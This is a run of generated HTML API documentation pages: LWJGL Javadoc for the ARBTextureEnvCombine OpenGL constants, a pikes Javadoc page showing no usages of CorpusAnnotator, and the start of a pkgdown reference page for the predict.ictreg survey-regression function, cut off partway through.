&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND1_RGB_ARB">GL_OPERAND1_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND2_ALPHA_ARB">GL_OPERAND2_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_OPERAND2_RGB_ARB">GL_OPERAND2_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_PREVIOUS_ARB">GL_PREVIOUS_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_PRIMARY_COLOR_ARB">GL_PRIMARY_COLOR_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_RGB_SCALE_ARB">GL_RGB_SCALE_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE0_ALPHA_ARB">GL_SOURCE0_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE0_RGB_ARB">GL_SOURCE0_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE1_ALPHA_ARB">GL_SOURCE1_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE1_RGB_ARB">GL_SOURCE1_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE2_ALPHA_ARB">GL_SOURCE2_ALPHA_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SOURCE2_RGB_ARB">GL_SOURCE2_RGB_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureEnvCombine.html#GL_SUBTRACT_ARB">GL_SUBTRACT_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ============ FIELD DETAIL =========== --> <A NAME="field_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Field Detail</B></FONT></TH> </TR> </TABLE> <A NAME="GL_COMBINE_ARB"><!-- --></A><H3> GL_COMBINE_ARB</H3> <PRE> public static final int <B>GL_COMBINE_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_COMBINE_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_COMBINE_RGB_ARB"><!-- --></A><H3> GL_COMBINE_RGB_ARB</H3> <PRE> public static final int <B>GL_COMBINE_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_COMBINE_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_COMBINE_ALPHA_ARB"><!-- --></A><H3> GL_COMBINE_ALPHA_ARB</H3> <PRE> public static final int <B>GL_COMBINE_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_COMBINE_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE0_RGB_ARB"><!-- --></A><H3> GL_SOURCE0_RGB_ARB</H3> <PRE> public static final int <B>GL_SOURCE0_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE0_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE1_RGB_ARB"><!-- --></A><H3> GL_SOURCE1_RGB_ARB</H3> <PRE> public static final int <B>GL_SOURCE1_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE1_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE2_RGB_ARB"><!-- --></A><H3> GL_SOURCE2_RGB_ARB</H3> <PRE> public static final int <B>GL_SOURCE2_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE2_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE0_ALPHA_ARB"><!-- --></A><H3> GL_SOURCE0_ALPHA_ARB</H3> <PRE> public static final int <B>GL_SOURCE0_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE0_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE1_ALPHA_ARB"><!-- --></A><H3> GL_SOURCE1_ALPHA_ARB</H3> <PRE> public static final int <B>GL_SOURCE1_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE1_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SOURCE2_ALPHA_ARB"><!-- --></A><H3> GL_SOURCE2_ALPHA_ARB</H3> <PRE> public static final int <B>GL_SOURCE2_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SOURCE2_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND0_RGB_ARB"><!-- --></A><H3> GL_OPERAND0_RGB_ARB</H3> <PRE> public static final int <B>GL_OPERAND0_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND0_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND1_RGB_ARB"><!-- --></A><H3> GL_OPERAND1_RGB_ARB</H3> <PRE> public static final int <B>GL_OPERAND1_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND1_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND2_RGB_ARB"><!-- --></A><H3> GL_OPERAND2_RGB_ARB</H3> <PRE> public static final int <B>GL_OPERAND2_RGB_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND2_RGB_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND0_ALPHA_ARB"><!-- --></A><H3> GL_OPERAND0_ALPHA_ARB</H3> <PRE> public static final int <B>GL_OPERAND0_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND0_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND1_ALPHA_ARB"><!-- --></A><H3> GL_OPERAND1_ALPHA_ARB</H3> <PRE> public static final int <B>GL_OPERAND1_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND1_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_OPERAND2_ALPHA_ARB"><!-- --></A><H3> GL_OPERAND2_ALPHA_ARB</H3> <PRE> public static final int <B>GL_OPERAND2_ALPHA_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_OPERAND2_ALPHA_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_RGB_SCALE_ARB"><!-- --></A><H3> GL_RGB_SCALE_ARB</H3> <PRE> public static final int <B>GL_RGB_SCALE_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_RGB_SCALE_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_ADD_SIGNED_ARB"><!-- --></A><H3> GL_ADD_SIGNED_ARB</H3> <PRE> public static final int <B>GL_ADD_SIGNED_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_ADD_SIGNED_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_INTERPOLATE_ARB"><!-- --></A><H3> GL_INTERPOLATE_ARB</H3> <PRE> public static final int <B>GL_INTERPOLATE_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_INTERPOLATE_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_SUBTRACT_ARB"><!-- --></A><H3> GL_SUBTRACT_ARB</H3> <PRE> public static final int <B>GL_SUBTRACT_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_SUBTRACT_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_CONSTANT_ARB"><!-- --></A><H3> GL_CONSTANT_ARB</H3> <PRE> public static final int <B>GL_CONSTANT_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_CONSTANT_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PRIMARY_COLOR_ARB"><!-- --></A><H3> GL_PRIMARY_COLOR_ARB</H3> <PRE> public static final int <B>GL_PRIMARY_COLOR_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_PRIMARY_COLOR_ARB">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PREVIOUS_ARB"><!-- --></A><H3> GL_PREVIOUS_ARB</H3> <PRE> public static final int <B>GL_PREVIOUS_ARB</B></PRE> <DL> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengl.ARBTextureEnvCombine.GL_PREVIOUS_ARB">Constant Field Values</A></DL> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ARBTextureEnvCombine.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureCubeMapArray.html" title="class in org.lwjgl.opengl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureEnvDot3.html" title="class in org.lwjgl.opengl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengl/ARBTextureEnvCombine.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARBTextureEnvCombine.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright &#169; 2002-2009 lwjgl.org. All Rights Reserved.</i> </BODY> </HTML>
docs/apidocs/eu/fbk/dkm/pikes/resources/mpqa/class-use/CorpusAnnotator.html
dkmfbk/pikes
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_241) on Wed Jul 15 12:32:10 CEST 2020 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Class eu.fbk.dkm.pikes.resources.mpqa.CorpusAnnotator (pikes 1.0-SNAPSHOT API)</title> <meta name="date" content="2020-07-15"> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class eu.fbk.dkm.pikes.resources.mpqa.CorpusAnnotator (pikes 1.0-SNAPSHOT API)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../eu/fbk/dkm/pikes/resources/mpqa/CorpusAnnotator.html" title="class in eu.fbk.dkm.pikes.resources.mpqa">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?eu/fbk/dkm/pikes/resources/mpqa/class-use/CorpusAnnotator.html" target="_top">Frames</a></li> <li><a href="CorpusAnnotator.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class eu.fbk.dkm.pikes.resources.mpqa.CorpusAnnotator" class="title">Uses of Class<br>eu.fbk.dkm.pikes.resources.mpqa.CorpusAnnotator</h2> </div> <div class="classUseContainer">No usage of eu.fbk.dkm.pikes.resources.mpqa.CorpusAnnotator</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../eu/fbk/dkm/pikes/resources/mpqa/CorpusAnnotator.html" title="class in eu.fbk.dkm.pikes.resources.mpqa">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?eu/fbk/dkm/pikes/resources/mpqa/class-use/CorpusAnnotator.html" target="_top">Frames</a></li> <li><a href="CorpusAnnotator.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2016&#x2013;2020 <a href="http://www.fbk.eu">FBK</a>. All rights reserved.</small></p> </body> </html>
docs/reference/predict.ictreg.html
SensitiveQuestions/list
<!-- Generated by pkgdown: do not edit by hand --> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Predict Method for Item Count Technique — predict.ictreg • list</title> <!-- jquery --> <script src="https://code.jquery.com/jquery-3.1.0.min.js" integrity="sha384-nrOSfDHtoPMzJHjVTdCopGqIqeYETSXhZDFyniQ8ZHcVy08QesyHcnOUpMpqnmWq" crossorigin="anonymous"></script> <!-- Bootstrap --> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <!-- Font Awesome icons --> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-T8Gy5hrqNKT+hzMclPo118YTQO6cYprQmhrYwIiQ/3axmI1hQomh7Ud2hPOy8SP1" crossorigin="anonymous"> <!-- pkgdown --> <link href="../pkgdown.css" rel="stylesheet"> <script src="../jquery.sticky-kit.min.js"></script> <script src="../pkgdown.js"></script> <!-- mathjax --> <script src='https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML'></script> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container template-reference-topic"> <header> <div class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="../index.html">list</a> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav"> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false"> How-To's <span class="caret"></span> </a> <ul class="dropdown-menu" role="menu"> <li> <a href="../articles/getting-started.html">Getting started</a> </li> <li> <a href="../articles/combined-list.html">Combining List Experiments with Direct Questions</a> </li> </ul> </li> <li> <a href="../articles/list-experiment-examples.html">Examples of List Experiments</a> </li> <li> <a href="../reference/">Reference</a> </li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false"> Packages <span class="caret"></span> </a> <ul class="dropdown-menu" role="menu"> <li> <a href="http://endorse.sensitivequestions.org">Endorsement experiments</a> </li> <li> <a href="http://list.sensitivequestions.org">List experiments</a> </li> <li> <a href="http://rr.sensitivequestions.org">Randomized response technique</a> </li> </ul> </li> <li> <a href="http://sensitivequestions.org">Sensitive Questions home</a> </li> </ul> <ul class="nav navbar-nav navbar-right"> </ul> </div><!--/.nav-collapse --> </div><!--/.container --> </div><!--/.navbar --> </header> <div class="row"> <div class="col-md-9 contents"> <div class="page-header"> <h1>Predict Method for Item Count Technique</h1> </div> <p>Function to calculate predictions and uncertainties of predictions from estimates from multivariate regression analysis of survey data with the item count technique.</p> <pre class="usage"><span class='co'># S3 method for ictreg</span> <span class='fu'>predict</span>(<span class='no'>object</span>, <span class='no'>newdata</span>, <span class='no'>newdata.diff</span>, <span class='no'>direct.glm</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>FALSE</span>, <span class='kw'>interval</span> <span class='kw'>=</span> <span class='fu'>c</span>(<span class='st'>"none"</span>, <span class='st'>"confidence"</span>), <span class='kw'>level</span> <span class='kw'>=</span> <span class='fl'>0.95</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>FALSE</span>, <span class='no'>sensitive.item</span>, <span class='no'>...</span>)</pre> <h2 class="hasAnchor" id="arguments"><a class="anchor" href="#arguments"></a> Arguments</h2> <table class="ref-arguments"> <colgroup><col class="name" /><col class="desc" /></colgroup> <tr> <th>object</th> <td><p>Object of class inheriting from "ictreg"</p></td> </tr> <tr> <th>newdata</th> <td><p>An optional data frame containing data that will be used to make predictions from. If omitted, the data used to fit the regression are used.</p></td> </tr> <tr> <th>newdata.diff</th> <td><p>An optional data frame used to compare predictions with predictions from the data in the provided newdata data frame.</p></td> </tr> <tr> <th>direct.glm</th> 